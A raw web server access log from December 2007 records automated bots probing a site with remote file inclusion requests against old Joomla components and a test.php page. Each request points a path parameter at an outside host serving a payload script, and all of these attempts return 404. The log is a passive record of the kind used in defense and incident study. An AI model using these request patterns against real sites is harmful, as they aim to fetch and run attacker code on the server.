213.239.141.6 - - [16/Dec/2007:16:26:07 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.239.141.6 - - [16/Dec/2007:16:26:08 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.239.141.6 - - [16/Dec/2007:16:26:08 -0800] "GET ///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.172.224.21 - - [16/Dec/2007:16:26:18 -0800] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://pyskaty.za.pl/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.172.224.21 - - [16/Dec/2007:16:26:18 -0800] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://pyskaty.za.pl/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:26:25 -0800] "GET /logs/access_071028.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.68.208.203 - - [16/Dec/2007:16:26:28 -0800] "GET /logs/access_071105.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.68.208.203 - - [16/Dec/2007:16:26:29 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
62.68.208.203 - - [16/Dec/2007:16:26:30 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.114.81.173 - - [16/Dec/2007:16:26:36 -0800] "GET /logs///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/31.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
207.114.81.173 - - [16/Dec/2007:16:26:36 -0800] "GET ///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/31.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.239.141.6 - - [16/Dec/2007:16:26:37 -0800] "GET /logs///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.141.6 - - [16/Dec/2007:16:26:38 -0800] "GET ///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.65.122.179 - - [16/Dec/2007:16:26:50 -0800] "GET /logs/access_071014.log/test.php?page=http://bicad.com/thumb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.65.122.179 - - [16/Dec/2007:16:26:50 -0800] "GET /test.php?page=http://bicad.com/thumb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.65.122.179 - - [16/Dec/2007:16:26:50 -0800] "GET /logs/test.php?page=http://bicad.com/thumb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:26:52 -0800] "GET /logs/access_071028.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:26:53 -0800] "GET /logs/access_071028.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404